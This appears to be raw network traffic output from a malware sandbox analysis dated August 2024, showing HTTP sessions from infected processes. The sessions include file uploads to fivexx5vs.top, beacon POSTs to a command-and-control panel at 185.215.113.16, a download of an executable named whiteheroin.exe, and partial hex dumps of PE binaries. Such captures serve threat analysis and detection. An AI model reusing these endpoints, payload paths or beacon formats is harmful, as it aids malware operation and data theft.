00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 83 2e cb 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 c4 5d 00 00 26 42 00 00 00 00 00 60 d3 5d 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 30 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win64$7PEd.f"]&B`]@0@ `gpfP0q/@l0gg(ffF.text]] `.data]]@.bss,e.idataPpfRze@.didataFfe@.edata`g\f@@.tlspg.rdatamg^f@@.relocg`f@B.pdata0@lk@@.rsrc/0q/o@@
Aug 26, 2024 23:29:31.975616932 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 30 a1 00 00 00 00 00 00 ee 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 40 00 00 00 00 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 Data Ascii: 0@@@Boolean@FalseTrueSystem@@AnsiChar`@Char@ShortInt@SmallInt
Aug 26, 2024 23:29:31.975630999 CEST	1236	IN	Data Raw: 40 00 00 00 00 00 06 00 00 00 00 00 00 00 02 02 44 33 02 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 02 02 44 34 02 00 02 00 05 00 0b c0 60 41 00 00 00 00 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 00 00 00 00 02 12 50 14 Data Ascii: @D3D4`A&op_Equality@P@LeftP@Right`A&op_Inequality@P@LeftP@RightaAEmptyP@aACreateP@
Aug 26, 2024 23:29:31.975656033 CEST	1236	IN	Data Raw: 90 17 40 00 00 00 00 00 04 4c 65 66 74 02 00 12 90 17 40 00 00 00 00 00 05 52 69 67 68 74 02 00 02 00 58 1a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 25 40 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Left@RightX@%@X@@@@@@0@@@P@ @@@ @0@@@P@%"@
Aug 26, 2024 23:29:31.975677967 CEST	1236	IN	Data Raw: 00 00 00 09 43 6c 61 73 73 49 6e 66 6f 03 00 38 11 40 00 00 00 00 00 18 00 01 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 38 00 80 c8 40 00 00 00 00 00 0c 49 6e 73 74 61 6e 63 65 53 69 7a 65 03 00 b8 10 40 00 00 00 00 00 18 00 01 Data Ascii: ClassInfo8@Self8@InstanceSize@SelfL@InheritsFrom@ Self@AClassK`@MethodAddress8@ Selfp@
Aug 26, 2024 23:29:31.975697041 CEST	1236	IN	Data Raw: 03 08 b0 25 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 08 b0 25 40 00 00 00 00 00 00 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 38 11 40 00 00 00 00 00 00 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 3d 00 30 d0 40 00 00 00 00 00 11 Data Ascii: %@Self%@ExceptObject8@ExceptAddr=0@AfterConstruction%@Self=@@BeforeDestruction%@SelfIP@Dispatch %@Self
Aug 26, 2024 23:29:31.975728989 CEST	1236	IN	Data Raw: 40 00 00 00 00 00 07 0d 57 65 61 6b 41 74 74 72 69 62 75 74 65 d0 27 40 00 00 00 00 00 c8 26 40 00 00 00 00 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 e8 28 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @WeakAttribute'@&@System(@)@(@(@%@@@@@0@@@P@ @@@ @0@@@
Aug 26, 2024 23:29:31.975799084 CEST	1236	IN	Data Raw: 00 00 10 c7 40 00 00 00 00 00 20 c9 40 00 00 00 00 00 30 c7 40 00 00 00 00 00 40 c7 40 00 00 00 00 00 50 c7 40 00 00 00 00 00 00 00 02 00 16 2d 40 00 00 00 00 00 44 00 f1 ff 5b 2d 40 00 00 00 00 00 44 00 f1 ff 00 00 0f 48 50 50 47 45 4e 41 74 74 Data Ascii: @ @0@@@P@-@D[-@DHPPGENAttributeE @Create(-@Selfp@ADataX@Create0-@Self@AFlagp@AData
Aug 26, 2024 23:29:31.975812912 CEST	32	IN	Data Raw: 00 00 00 00 00 00 a0 31 40 00 00 00 00 00 14 0c 50 53 68 6f 72 74 53 74 72 69 6e 67 70 12 40 00 Data Ascii: 1@PShortStringp@
Aug 26, 2024 23:29:31.976490974 CEST	1236	IN	Data Raw: 00 00 00 00 02 00 c0 31 40 00 00 00 00 00 14 0b 50 41 6e 73 69 53 74 72 69 6e 67 a0 13 40 00 00 00 00 00 02 00 00 e0 31 40 00 00 00 00 00 14 0b 50 57 69 64 65 53 74 72 69 6e 67 88 13 40 00 00 00 00 00 02 00 00 00 32 40 00 00 00 00 00 14 0e 50 55 Data Ascii: 1@PAnsiString@1@PWideString@2@PUnicodeStringp@(2@UTF8String@2@RawByteString`2@PInteger@2@PByte@2@PIn
Aug 26, 2024 23:29:31.976638079 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 02 07 56 4f 6c 65 53 74 72 02 00 38 11 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 09 56 44 69 73 70 61 74 63 68 02 00 10 14 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 06 56 45 72 72 6f 72 02 00 00 13 40 00 00 00 00 00 08 00 Data Ascii: VOleStr8@VDispatch@VError@VBoolean8@VUnknownx@VShortInt@VByte@VWord@VLongWordX@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49741	195.133.48.136	80	5108	C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:34.730967045 CEST	332	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary37490463 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 413 Host: fivexx5vs.top
Aug 26, 2024 23:29:34.730982065 CEST	413	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 37 34 39 30 34 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 69 73 Data Ascii: ------Boundary37490463Content-Disposition: form-data; name="file"; filename="Sisalokik.bin"Content-Type: application/octet-stream:ll?kww&?\|cn0L'xwwjb={xC+)w,C f@J}LB;xN
Aug 26, 2024 23:29:35.479423046 CEST	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Mon, 26 Aug 2024 21:29:35 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK
Aug 26, 2024 23:29:39.391732931 CEST	334	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary30639003 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 63841 Host: fivexx5vs.top
Aug 26, 2024 23:29:39.391813993 CEST	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 30 36 33 39 30 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 44 6f 68 Data Ascii: ------Boundary30639003Content-Disposition: form-data; name="file"; filename="Dohacinur.bin"Content-Type: application/octet-stream[qp2<(q{uMixt6yF7D@`LN&`y8hb1t6%iSv!+HJI
Aug 26, 2024 23:29:39.399943113 CEST	2472	OUT	Data Raw: 4c da b7 b0 f2 b1 aa dd 50 8e 3f 98 b1 bb c3 d1 d1 d9 6b ed 24 0d 05 a5 ce 8c 7a de 7e cb 85 2c 3d 06 83 88 05 67 93 d1 c7 67 9f ce f3 6f ea 45 d5 e2 5b 1d 4c b7 91 e0 fa 56 30 e8 bd 4f 0d e1 ff c1 e5 83 16 6e 23 f8 b0 e8 b1 b6 22 7b 3a aa be 1d Data Ascii: LP?k$z~,=ggoE[LV0On#"{:1QBUN_/g3sV"a4C9oEV>9,u=Hw,eCaL_5e~TO3)Y796~3]:}oEU?F(+;d.hpA&1c
Aug 26, 2024 23:29:39.400077105 CEST	2472	OUT	Data Raw: 3c 11 f6 0c 4b 6f 82 ac c8 cc f4 16 2d f8 db ca 56 ff 9e 16 a4 61 66 45 14 19 66 b3 36 be 22 28 ff 72 60 35 47 8b 90 5d 30 83 cb 2f a2 f0 5e 02 65 a5 3a 62 df bb 3d d5 7e 1b ee 0d 7b f0 81 a8 44 15 da b3 4e 31 d2 54 36 1e 16 a7 a8 5a 97 54 80 cf Data Ascii: <Ko-VafEf6"(r`5G]0/^e:b=~{DN1T6ZT%`=^6;uVEOd}0)>W_v_?PqDtZd}\B4;C8}Hpl?4NjX@lB0uJw9B
Aug 26, 2024 23:29:39.400105953 CEST	4944	OUT	Data Raw: 9e a5 fa 52 e5 79 2b 0e ea 8f e7 b2 31 f0 c5 45 4d 4f a0 9f 2e 43 eb dd 93 30 c1 50 f0 b5 c0 8c 32 00 ab 34 d0 05 55 3b b6 56 53 43 6c 7e c0 d8 af 7e 50 26 34 78 4b 9d 96 f5 74 91 12 c3 ff fa 67 54 0b 0b 52 80 52 3d 31 43 f2 25 3f 71 77 2f e4 11 Data Ascii: Ry+1EMO.C0P24U;VSCl~~P&4xKtgTRR=1C%?qw/`J~P4+D_,CvAnk0!Er{S,;>Z6i#xE/}sJ>W1~nMpB-,pAK,v@?WH
Aug 26, 2024 23:29:39.400468111 CEST	6180	OUT	Data Raw: 9b 29 04 a0 d9 b0 10 c8 a6 cd 86 43 2b d4 43 87 2f c4 7b d8 f7 61 12 88 92 ee 5f c9 a8 c9 ae f1 44 b8 b0 fb 04 8d 90 31 00 83 dc 70 c6 78 63 42 00 26 c8 22 96 9a aa a1 b2 14 17 8f 2c 9d a7 7d b8 46 ee c0 3c 20 ad e9 01 8d 4f f8 cf e4 22 82 53 24 Data Ascii: )C+C/{a_D1pxcB&",}F< O"S$SJ0K=KH"r;x>:XZT^1QVF`6J~%#`Ft"RC2X>3ta&~?>ORD@]hE(sli,8.-
Aug 26, 2024 23:29:39.400496960 CEST	3708	OUT	Data Raw: f5 30 21 1c dd 56 38 49 58 13 e5 6f fd 7d 7f 33 fd 1a 1f 0c 65 e2 0f 6a 62 43 2d 1c 50 b0 9b 8d ce 6a e3 80 61 7f 72 40 cc f4 20 cd d5 1d 17 bf f3 31 19 7e 5e de 09 cd 58 43 02 a7 f1 43 dd 70 a5 88 3a b3 65 de 61 7e 2a 6e 29 a7 ff ca 4f f6 9c 48 Data Ascii: 0!V8IXo}3ejbC-Pjar@ 1~^XCCp:ea~*n)OH8_6\|$0^>pZ}&L`KT,bnOvI"FXzHJ{'A&y'b=JPi-[a%]5M94h.MW5iN>9aM
Aug 26, 2024 23:29:39.400616884 CEST	4944	OUT	Data Raw: 6c 5c 74 ce cb df 4b 48 e8 6d f8 5c 09 c0 d9 4d b7 bc f0 a9 f2 96 2c d1 80 42 4e 77 2d fe 05 4b 65 c8 f2 1b 7f a0 22 f2 fe 08 78 64 15 99 f3 f1 36 14 0d 31 3a 0d c1 c9 2b c9 1c 3e f9 51 0d db c7 fc d6 a9 ce 46 5e 6d 32 12 63 3c 62 0c 19 ca 9d df Data Ascii: l\tKHm\M,BNw-Ke"xd61:+>QF^m2c<bwGRjv[[W]R^S(\|nPL30kQ~G1D2+N=W<p,ufi;*m0C&bs::5P\R.H5ZyN
Aug 26, 2024 23:29:39.405797005 CEST	2472	OUT	Data Raw: e1 e2 58 79 e5 ec f2 9f 7d 95 5e a4 e0 b7 2f 2e 3c fd a9 04 51 71 5e 87 c0 bd 6c 7a 1f 81 db 3f 27 0f bb d1 c9 14 ce 54 fb aa b7 1f 2b 3a 7d fc 5e 9a 37 b9 16 7f 19 ea 76 a2 1b 2a d1 69 3a be 4c 82 d0 19 af fc 47 c1 10 ba 5a a5 76 8f 31 b9 f3 1d Data Ascii: Xy}^/.<Qq^lz?'T+:}^7v*i:LGZv1E)NWef7Q^MS^0!!#d6;&?9bpBx2~1G4==ilV$cC8.$``it1hxk-pJq]"@ZC1% 1#&
Aug 26, 2024 23:29:39.406002045 CEST	4944	OUT	Data Raw: 60 05 fd ec bf 63 2c df 8f 05 5a 75 dc 39 85 83 23 4e 04 fc a3 b1 48 77 7c 37 3e dd d1 d2 fc f5 f1 1f e9 f8 32 66 b4 f5 ed 2b 04 88 d9 a9 e6 e2 40 9a 00 62 c2 e1 67 44 ec 90 82 b8 51 6b 80 38 43 e5 28 16 52 13 8a 5c 99 bb 17 57 b4 f5 55 d1 4c c8 Data Ascii: `c,Zu9#NHw\|7>2f+@bgDQk8C(R\WULTR@-bsD1,aMS_fAyrtMp+ kcGiGt]Om9Sr5n(I{(\|nZ b}=khuJOkc/pT&b
Aug 26, 2024 23:29:39.893939972 CEST	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Mon, 26 Aug 2024 21:29:39 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK
Aug 26, 2024 23:29:43.594007969 CEST	334	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35885869 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 30057 Host: fivexx5vs.top
Aug 26, 2024 23:29:43.960038900 CEST	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Mon, 26 Aug 2024 21:29:43 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49742	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:41.700336933 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Aug 26, 2024 23:29:42.455946922 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 26, 2024 23:29:42.457935095 CEST	59	OUT	GET /inc/whiteheroin.exe HTTP/1.1 Host: 185.215.113.16
Aug 26, 2024 23:29:42.700536966 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:42 GMT Content-Type: application/octet-stream Content-Length: 747008 Last-Modified: Sun, 25 Aug 2024 12:24:28 GMT Connection: keep-alive ETag: "66cb227c-b6600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8d 1c cb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 5a 0b 00 00 0a 00 00 00 00 00 00 9e 79 0b 00 00 20 00 00 00 80 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0b 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 79 0b 00 4b 00 00 00 00 80 0b 00 d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfZy @ @PyK H.textY Z `.rsrc\@@.relocd@ByH8$'@I$OUj>&OI*JRPmkJR98"/%cW5yBIS\<:LH!2KO5][OdfpOg@ip=U-I}Ki,pD<L(AAZH8.2l)f?oe6E=Tcq'8(_}Nyr%M9{;rt\|#N8~<qPti:cW\|nl"=zc\|d{Lqt?AF;i}
Aug 26, 2024 23:29:42.700550079 CEST	1236	IN	Data Raw: ed d8 dd f8 f0 b9 d3 ad e8 21 34 f1 a0 78 10 14 8a b4 3e 4c a2 4a cf 76 a0 48 f3 70 6b 91 5d 52 90 4c ce 99 29 df 82 f6 eb 48 05 8b 60 5d ee e3 e6 50 ff d8 51 d6 c4 2c 30 35 b0 58 96 7f 79 33 67 cd d4 3d 4d 83 85 ca 40 d8 86 5b a6 6b 47 59 4c c0 Data Ascii: !4x>LJvHpk]RL)H`]PQ,05Xy3g=M@[kGYL}TMWFP!3XOCUl(fWA`}_4d3:DsW\|cV:>b)u:+.K$!3MV6bbZw\|
Aug 26, 2024 23:29:42.700560093 CEST	1236	IN	Data Raw: f2 bc 6b 70 37 5c 40 a8 57 6b bd 15 16 47 a5 a8 5e e6 1a 39 4b 85 c3 7c 79 40 db 9b 8f 4b a7 75 af 16 97 f2 4f e3 e5 e7 8e aa 19 ec 4c bd 75 66 79 c3 56 f3 4e 3d 41 d4 72 ad 30 62 02 17 e3 a0 30 0a 48 ce dc 1e 08 ff 02 ec aa ff 93 6d 54 30 1f 55 Data Ascii: kp7\@WkG^9K\|y@KuOLufyVN=Ar0b0HmT0U?hL!.";k$s(PSf}3p/?n~[HX`s4.EqE)=t`\1`*N<iN9b+K\| o]\6%>gH0rD{i~r{B\|
Aug 26, 2024 23:29:42.700571060 CEST	1236	IN	Data Raw: 54 ed fe db dc 7c 13 a2 4c 7c 9d a4 b1 ca e8 38 6f 74 02 c6 b0 54 bc 79 3f 62 34 62 5c 9b 24 90 95 34 0a d4 5e 53 b8 66 63 0e 6e 61 fc ad 2f d8 fa 7c 98 f8 0c 14 db 15 bc dd 5a 3c 3c d9 fe 4e a5 7e 33 56 82 60 41 a0 2f e9 03 57 32 12 06 60 1b 3d Data Ascii: T\|L\|8otTy?b4b\$4^Sfcna/\|Z<<N~3V`A/W2`=kk9g}EXM.r7K_X*)\|k^a5ve,^A]6`6lR=q2Bm[A+_bBn[X6&xqjV<HW5##,#Bisn
Aug 26, 2024 23:29:42.700582027 CEST	1236	IN	Data Raw: bb 61 0d 87 77 e5 1d 7a 3e bb 9f 6d 74 bb 9b f4 7c 6f 47 77 25 31 b6 36 3b 56 50 09 e6 e4 f6 8e 57 28 ff aa b6 0f 8b 44 c0 f2 f4 8e d5 08 47 ef 46 83 04 b1 b6 2a 74 2a 0e 4d 1e 7c da 1b 29 e5 63 84 0f a7 31 88 59 60 2d 2d 6a 5a c0 d3 5d 0d 48 e8 Data Ascii: awz>mt\|oGw%16;VPW(DGFtM\|)c1Y`--jZ]HqAtYbCT6'v8k\cmX['+K\spBW59:{g15)[P^2Nfv'YrQ/K3d~3h~fcIvOIwSKR'3O`C6
Aug 26, 2024 23:29:42.700592041 CEST	1236	IN	Data Raw: 46 cb fd fd 96 08 65 27 d1 aa cd db e8 c0 c2 ce fa 94 6a 72 f0 45 ec 45 47 2f a3 41 64 cd b5 2f 2c 2f 14 87 a5 96 f7 32 5c 34 32 56 50 58 b8 83 0a 1d ce 23 c8 1f eb 67 73 5e dd f4 e3 1e 0a 15 a4 f4 6a 82 77 a5 62 ae 74 b6 3b cc fb a3 38 02 ff 16 Data Ascii: Fe'jrEEG/Ad/,/2\42VPX#gs^jwbt;8 O$ufc``!#u9w#B?k3Y&CoBc%A[h __9N[duqlv63F(27P%{)g6{4
Aug 26, 2024 23:29:42.700608015 CEST	1236	IN	Data Raw: 6d f7 ca 62 96 81 75 a7 cf 9e db 80 a8 66 61 7d 57 c6 87 05 63 5a b0 8a 23 be 10 8c e8 56 ef 21 27 82 8b ac e5 e7 ef 5c 4e 6a 6e cd f4 f3 c4 ae 7e c5 c8 d5 2d 12 27 8f 74 c5 67 86 00 9f 36 1e 69 63 22 66 e6 b3 cf f9 73 6c f7 2a 6b f2 4e b9 db 2a Data Ascii: mbufa}WcZ#V!'\Njn~-'tg6ic"fslkNS;{SG^1F_dZt/3YHF,{64E$\|>-XE{@Cw( p8c^7-ROY+u$ktTru.2X_.mEKmU
Aug 26, 2024 23:29:42.700618029 CEST	1236	IN	Data Raw: ea 38 cd ba c3 22 84 a0 5b 01 37 19 1b 8d 94 bd 82 c5 12 1d cb 3b 49 4e ea ff 4f 89 30 8c 1e 00 e2 17 f2 58 e8 cb ce d6 76 fb 80 df e8 10 21 01 df 40 fd 90 a0 e1 3b d9 ef 2f 2d e7 9b 90 f2 e5 c3 58 35 a8 f0 dc 03 fe 96 42 52 80 33 7f 3a 45 97 57 Data Ascii: 8"[7;INO0Xv!@;/-X5BR3:EW*85{4>)t&u8Dy,.^n/Qp$s6[&yGpF8{3mMbHjZVyIU]Z(xUFA"7_
Aug 26, 2024 23:29:42.700628042 CEST	1236	IN	Data Raw: 9f b7 99 d8 7b b5 bf 91 98 c9 a3 52 e8 2b 8d e7 03 32 40 36 d8 c5 e6 0d 41 09 eb c2 3a 80 22 78 04 95 e6 bc 4a 05 14 32 37 0e 9f 50 67 78 02 35 0b 02 fc 2b 56 ff 45 23 ac a4 8b cc f1 dd 74 63 0c 36 9f ec ec 7f 26 3f ee ef cf 16 46 5a a4 90 c2 92 Data Ascii: {R+2@6A:"xJ27Pgx5+VE#tc6&?FZ&2Zh6>v8mfx6kG.fuO(~Zw~d1UM{5r,Reg?\J\|9Doj<k2`Y!-B~1mWEiy\U8_*:?Y
Aug 26, 2024 23:29:42.700639963 CEST	1236	IN	Data Raw: 14 e2 59 a4 61 4b bb 3a 54 cf c3 33 30 b6 d8 86 4b 0a 08 fc 15 06 4b a8 e2 f8 b1 42 e8 e1 2f cc 26 b2 d9 b6 a8 25 5e 17 54 00 50 80 20 ef 5d ea bc b3 6c 24 e4 3d a3 d2 67 76 e6 0f 30 90 1f 71 9c 01 d0 96 15 06 d9 63 a0 0d 4f 62 b3 c2 c8 f2 f9 69 Data Ascii: YaK:T30KKB/&%^TP ]l$=gv0qcObiactctUFOt>7^*wP2+Tj%FE7:[Pid!sN[FTwFFPV~G;$YzI,\|e!R7SwmI]X8]L38q5"
Aug 26, 2024 23:29:42.701361895 CEST	1236	IN	Data Raw: 58 ce ea ad 59 d5 79 fb 11 e4 24 69 d0 e8 56 c3 60 9a c8 c5 f2 89 56 f8 8c d2 0c 9b 23 25 44 3e dd dd 14 29 98 51 7a 9c 88 93 d0 15 63 8a 92 09 8a 0f a7 ae ed 5d 0a 06 29 b2 7a 01 c3 12 0a b0 20 40 dd 58 6b f9 12 72 0c 6d 24 a9 e2 82 34 42 0b ed Data Ascii: XYy$iV`V#%D>)Qzc])z @Xkrm$4BN_`rU!T9<Y([(5{8q$!>O&t[tND@t:SMUK1xAI51w*Iq4VsA.w(?#~~C4X+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49743	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:44.446559906 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000192001&unit=246122658369
Aug 26, 2024 23:29:45.189996004 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49744	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:45.190975904 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wgnxvkcddotte.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 161 Host: yosoborno.com
Aug 26, 2024 23:29:45.191004038 CEST	161	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 59 b9 a7 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA .[k,vu}Yv%cF}0H!yg2YEKXPK8b>4]~
Aug 26, 2024 23:29:46.273868084 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 85 e5 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49745	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:45.338146925 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:46.099827051 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:46.235908985 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
